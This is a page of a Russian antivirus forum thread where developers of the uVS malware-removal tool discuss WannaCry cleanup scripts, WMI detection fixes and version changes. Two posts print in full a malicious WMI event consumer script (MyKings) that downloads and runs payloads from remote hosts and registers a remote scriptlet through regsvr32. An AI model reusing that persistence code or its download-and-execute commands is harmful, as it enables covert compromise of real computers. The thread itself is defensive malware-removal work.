uVS - Тестирование - Страница 15 - Universal Virus Sniffer (uVS) - развитие, использование и решение проблем - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

santy
25 минут назад, demkd сказал:

нашел кого цитировать xD

ну, или так:

Цитата

Сегодня (примечание: без объявления войны), 12 мая 2017 года, компании и организации из самых разных стран мира (включая Россию) начали массово сообщать об атаках шифровальщика Wana Decrypt0r, который также известен под названиями WCry, WannaCry, WannaCrypt0r и WannaCrypt.

Впервые вымогатель WCry был обнаружен еще в феврале 2017 года, но тогда он не произвел большого впечатления на специалистов. По сути, до сегодняшнего дня шифровальщик был практически неактивен, но теперь он получил версию 2.0 и использует SMB-эксплоит АНБ из инструментария, опубликованного ранее хакерской группой The Shadow Brokers.

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

как временная мера:

 

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
bp C:\WINDOWS\MSSECSVC.EXE
bl DB349B97C37D22F5EA1D1841E3C89EB4 3723264
bp C:\PROGRAMDATA\MHLNIUXMEKA934\TASKSCHE.EXE
bl 84C82835A5D21BBCF75A61706D8AB549 3514368
bp C:\USERS\PUBLIC\DESKTOP\@WANADECRYPTOR@.EXE
bl 7BF2B57F2A205768755C07F238FB32CC 245760
restart


перезагрузка, пишем о старых и новых проблемах.
------------

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, santy сказал:

вот это мне кажется больше похоже на правду
"Сбербанк, МВД и МЧС заявили, что хакерам не удалось проникнуть через их системы защиты.«Все попытки вирусных атак на компьютеры были блокированы, заражению не подвергся ни один компьютер. Все интернет-ресурсы МЧС России работают в штатном режиме», — приводит ТАСС слова представителя ведомства."
Тут обычная проблема с дырой в винде, те кто был без надежных фаеров и полегли в очередной раз, ничему не учатся, хотя давно понятно что ходить в инет без железного (в виде роутера) и софтового фаера на машине мягко говоря глупо.
В данном случае и накладно, тем более что адреса для получения выкупа далеко не уникальны и надеяться на разблокировку путем откупа не приходится.
Да и обновляться таки нужно (в данном случае MS17-010 нужен как минимум), а не отключать автоматическое обновление или сидеть на устаревших осях.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

С WMI проблема была в том что не просматривались все неймспейсы, исправил.
Проблема c FireFox и русскими именами пользователей в путях дополнений осталась... эти.... затейливый клоуны используют непонятную 4-х байтовую кодировку символов, когда время будет разберусь, с ходу я так и не понял что это и главное ЗАЧЕМ ЭТО?

---------------------------------------------------------
 4.0.3
---------------------------------------------------------
 o Улучшена функция поиска обработчиков WMI, теперь просматриваются все неймспейсы.

 

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

хорошо, тема с обработчиком событий в WMI опять всплыла.

и пока что здесь не решена.

https://forum.kasperskyclub.ru/index.php?showtopic=55590

может получиться на ней проверить.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
11 минут назад, santy сказал:

может получиться на ней проверить.

эта версия точно должна видеть, обработчик скорее всего сидел в default неймспейсе, autoruns его просматривает, а uVS не просматривал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

запросил образ от 4.0.3,

но

здесь и версия 4.0.2 видит его,


 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

                            

 

HOME-9BAC17A5E2_2017-05-13_19-03-52.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
10 минут назад, santy сказал:

здесь и версия 4.0.2 видит его,

Потому что он в "subscription" неймспейсе, возможно копия и в default сидит, поэтому таки лучше использовать 4.0.3
по идее можно и в другие неймспейсы инсталлировать поддержку обработчиков и будет работать в каком-нибудь "microsoft", но до этого вирусописатели похоже еще не додумались, впрочем теперь уже без разницы, uVS будет видеть его и там.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

А как эта вся картинка целиком выглядит

Как всё работает - механика так сказать ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

По поводу SHA1 для WMI

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

новый образ, спасибо ребятам с фанклуба ЛК.

 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};


 

                           

HOME-9BAC17A5E2_2017-05-13_19-26-30.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Сейчас открыл: C:\WINDOWS\system32\wbem

там, есть: C:\WINDOWS\system32\wbem\AutoRecover   с файликами

А не может так получиться, что мы запись удалим...

А она возьмёт и AutoRecover...

И я бы всё таки посмотрел: C:\WINDOWS\system32\wbem\Framework

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Сравнил выше приведённые скрипты.

Версия: 4.0.3 содержит дополнительную запись:

25 минут назад, santy сказал:

Namespace                   \\.\root\subscription

Которой нет в: 4.0.2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
1 час назад, PR55.RP55 сказал:

Как всё работает - механика так сказать ?

я ссылки давал на msdn там все расписано что и как.
 

1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

14 минут назад, PR55.RP55 сказал:

Которой нет в: 4.0.2

Да, теперь указывается неймспейс,  но в след версиях я думаю я его перенесу в путь до объекта.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
18 минут назад, demkd сказал:
1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

Расчёт  общей суммы ( глобального ) SHA1 для : Инфо.

как раз и позволит создать уникальный идентификатор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

1 штук.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Что там за кодировку использовали клоуны из мозиллы я так и не нашел, но декодер сделал, будет ли декодировать что-то отличное от кириллицы я не знаю, проверять желания нет.

---------------------------------------------------------
 4.0.4
---------------------------------------------------------
 o Исправлена ошибка в функции анализа расширений Firefox.

 o Добавлена поддержка кириллицы в пути до расширения Firefox.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 11.05.2017 at 11:18 PM, demkd сказал:
В 11.05.2017 at 9:01 PM, PR55.RP55 сказал:

Такие объекты сразу должны попадать в подозрительные.

это да.

В новых версиях я этого не вижу.

Demkd

А вообще есть какой - то блокнот\планировщик, чтобы всё - всё помнить ?   :(

:)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Даже и не знаю...

-------------

Полное имя                  C:\USERS\ADMIN\DOWNLOADS\UVS_LATEST.ZIP
Имя файла                   UVS_LATEST.ZIP
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
Размер                      3387073 байт
Создан                      15.05.2017 в 16:42:45
Изменен                     15.05.2017 в 16:43:00
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\uvs_latest.zip"
SHA1                        C690C80CFD215299BCAE4E28DAC99467A64B51C6
MD5                         1DDB17583AD3E710A5ECEA5B7AC19285
                            

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor
14 часов назад, PR55.RP55 сказал:

Даже и не знаю...

Тоже  заметил в последнее время много подобных файлов, которые раньше вроде не выводились.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Цитата

Анализ автозапуска...
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!

образ здесь:

МАКСИМ-ПК_2017-05-21_16-08-54.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Посмотрел образ и мне мысля пришла...

А, что если рассчитывать SHA1 не только для файлов\объектов но и для  cmd и аналогичных записей.

типа:

"C:\Program Files\Common Files\Doctor Web\Scanning Engine\dwantispam.exe" -pipe:ASServer.Dr.Web -path:"C:\Program Files\Common Files\Doctor Web\Scanning Engine\\"

Таким образом можно автоматически определить легальна данная запись, или нет.

К примеру в системе\образе есть некий объект - его SHA1 нет в базе проверенных но для его деятельности:  команда\ы легальны и есть в базе...

т.е. Такой гибкий способ проверки.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Может быть рассчитывать не именно SHA1 - а некий его аналог = идентификатор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
4 часа назад, santy сказал:

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Гляну.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

---------------------------------------------------------
 4.0.5
---------------------------------------------------------
 o Добавлен вывод ошибок инициализации com-интерфейса.

 o Добавлен фильтр на расширения в функцию анализа параметров запуска.

 o При сканировании списка по F3/F7 статус подозрительного файла получают все исполняемые файлы с нестандартными расширениями.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти

  • Сообщения

    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 19.2.17.
    • santy
      Например: форумы Anti-Malware, официальный и неофициальный технические форумы Касперского разработаны при поддержке Powered by Invision Community Invision Community (ранее IPS Community Suite, Invision Power Board, сокращенно IPS, IP.Suite или IP.Board) — коммерческое программное обеспечение для организации веб-форумов, разрабатываемое американской компанией Invision Power Services Inc ----------- Получается 1С-Битрикс наше все.
    • PR55.RP55
      КОТ ( Комитет Охраны Тепла ) Африка
      Неизбежность войны, предвкушаю крах
      Если я говорю, значит, он прав
      Армагеддон — это больше, чем страх
      Это любовь, это слёзы и кровь
      Твоих сыновей
      Африка!

      [Бридж]
      Твои волосы — как прутья
      Твои мысли — белый мел
      Я однажды не проснулся
      Оттого что я висел

      [Предприпев]
      Африка!
      На твоих руках
      Твоё солнце в моих глазах
      Африка!

      [Припев]
      Чёрное на белом
      Кто-то был неправ
      Я внеплановый сын африканских трав
      Я танцую регги на грязном снегу
      Моя тень на твоём берегу
      Африка!
    • santy
      Я думаю, разработчики закона сами еще не знают как трактовать то, что они сделали. например это: Если владелец сайта является гражданином РФ или российским юридическим лицом является ли система российской, владельцем которой он считается, если сам сайт построен на зарубежном движке?
    • PR55.RP55
      " Запрет на использование иностранных сервисов авторизации (Google, Apple) на российских сайтах, введенный законами № 406-ФЗ и № 670-ФЗ, направлен на локализацию персональных данных и борьбу с утечками, требуя перехода на российские ID-системы, такие как ya.ru или mail.ru [1]. Старые аккаунты, созданные через иностранные сервисы, не удаляются, однако владельцы сайтов обязаны перевести пользователей на легитимные методы входа, включая российскую почту, телефон или Госуслуги, чтобы избежать ответственности за текущие авторизации [1]. " " Владельцы сайтов будут обязаны проводить авторизацию пользователей (например, при регистрации или входе в личный кабинет) с использованием только российских систем. К ним относятся: номер российского телефона; портал "Госуслуги"; единая биометрическая система; иные системы, владельцами которых являются граждане РФ или российские юридические лица." ya.ru или mail.ru - в теории ( и на практике ) граждане р.ф. Сама почта требует авторизации - через номер телефона. т.е. зарегистрированный пользователь уже прошёл авторизацию.  ---------- Оценка выше написанного в ИИ. :) Давайте разберем, почему ваши тезисы и выводы полностью корректны.
      1. Соответствие критериям закона
      Вы абсолютно правы: сервисы *Яндекс (ya.ru)* и *VK (VK ID / Mail.ru)* на
      100% подпадают под четвертый пункт статьи 10.2-1 закона «Об информации»:   * Их владельцами являются *российские юридические лица*.
        * Доля иностранного владения в них приведена в полное соответствие с
          законодательством РФ (контролирующие структуры находятся в
          российской юрисдикции). 2. Цепочка авторизации (наследование доверия)
      Ваша мысль о том, что /«почта требует авторизации через телефон, а
      значит, пользователь уже авторизован»/, юридически называется
      *делегированием авторизации*.   * Закон обязывает владельца форума использовать /российскую систему/
          для входа.
        * Яндекс ID или VK ID — это и есть авторизационные информационные системы.
        * То, что эти ИС внутри себя уже проверили пользователя (по номеру
          телефона, привязке к Госуслугам или через подтвержденный профиль), —
          это их зона ответственности. Для вашего форума главное, что сама
          «входная дверь» (Яндекс/VK) является российской. 3. Обязанности владельца сайта
      Приведенная вами цитата точно описывает текущее положение дел:   * *Закон не требует удалять профили* людей, вошедших когда-то через
          Google.
        * *Закон запрещает процесс* предоставления авторизации через
          иностранцев /сейчас/.
        * Чтобы не получить штраф (вступивший в силу по законопроекту №
          1110676-8), владелец сайта должен закрыть техническую возможность
          кликнуть на «Вход через Google/Apple» и предложить пользователю
          привязать к старому аккаунту российский аналог (почту, телефон или
          Яндекс/VK ID). ------- Но лучше всё это ещё уточнить.    
×